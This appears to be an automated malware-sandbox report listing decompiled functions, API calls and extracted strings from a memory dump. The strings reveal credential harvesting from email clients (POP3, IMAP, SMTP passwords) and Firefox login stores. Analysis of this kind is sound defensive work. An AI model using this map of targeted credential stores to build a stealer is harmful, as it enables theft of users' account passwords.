                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                  • API String ID: 3963849919-1658304561
                                                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                  Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004024F5
                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                  • _mbscpy.MSVCRT ref: 00402533
                                                  • _mbscpy.MSVCRT ref: 004025FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$QueryValuememset
                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                  • API String ID: 168965057-606283353
                                                  • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                  • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                  Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                  • memset.MSVCRT ref: 0040128E
                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                  • String ID:
                                                  • API String ID: 2998058495-0
                                                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                  Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 633282248-1996832678
                                                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                  Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: sprintf$memset$_mbscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 3402215030-3842416460
                                                  • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                  • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                  Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                  • strlen.MSVCRT ref: 0040F139
                                                  • strlen.MSVCRT ref: 0040F147
                                                  • memset.MSVCRT ref: 0040F187
                                                  • strlen.MSVCRT ref: 0040F196
                                                  • strlen.MSVCRT ref: 0040F1A4
                                                  • memset.MSVCRT ref: 0040F1EA
                                                  • strlen.MSVCRT ref: 0040F1F9
                                                  • strlen.MSVCRT ref: 0040F207
                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                  • _mbscpy.MSVCRT ref: 0040F2CD
                                                  • _mbscpy.MSVCRT ref: 0040F30E
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                  • API String ID: 1613542760-3138536805
                                                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                  Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                  • API String ID: 1012775001-1343505058
                                                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                  Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-232097475
                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                  Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcsstr.MSVCRT ref: 0040426A
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                  • _mbscpy.MSVCRT ref: 004042D5
                                                  • _mbscpy.MSVCRT ref: 004042E8
                                                  • strchr.MSVCRT ref: 004042F6
                                                  • strlen.MSVCRT ref: 0040430A
                                                  • sprintf.MSVCRT ref: 0040432B
                                                  • strchr.MSVCRT ref: 0040433C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                  • String ID: %s@gmail.com$www.google.com
                                                  • API String ID: 3866421160-4070641962
                                                  • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                  • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                  Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  • API String ID: 2360744853-2229823034
                                                  • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                  • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                  Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strchr.MSVCRT ref: 004100E4
                                                  • _mbscpy.MSVCRT ref: 004100F2
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                  • _mbscpy.MSVCRT ref: 00410142
                                                  • _mbscat.MSVCRT ref: 0041014D
                                                  • memset.MSVCRT ref: 00410129
                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                  • memset.MSVCRT ref: 00410171
                                                  • memcpy.MSVCRT ref: 0041018C
                                                  • _mbscat.MSVCRT ref: 00410197
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                  • String ID: \systemroot
                                                  • API String ID: 912701516-1821301763
                                                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                  Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                  • strchr.MSVCRT ref: 0040327B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringstrchr
                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                  • API String ID: 1348940319-1729847305
                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                  Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                  Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                  • String ID:
                                                  • API String ID: 3642520215-0
                                                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                  Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                  • String ID:
                                                  • API String ID: 1999381814-0
                                                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                  Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                  • API String ID: 1297977491-3883738016
                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                  Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040810E
                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7610E430,?), ref: 004081B9
                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                  • API String ID: 524865279-2190619648
                                                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                  Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 2300387033-3849865405
                                                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                  Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$memsetsprintf
                                                  • String ID: %2.2X
                                                  • API String ID: 125969286-791839006
                                                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                  Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
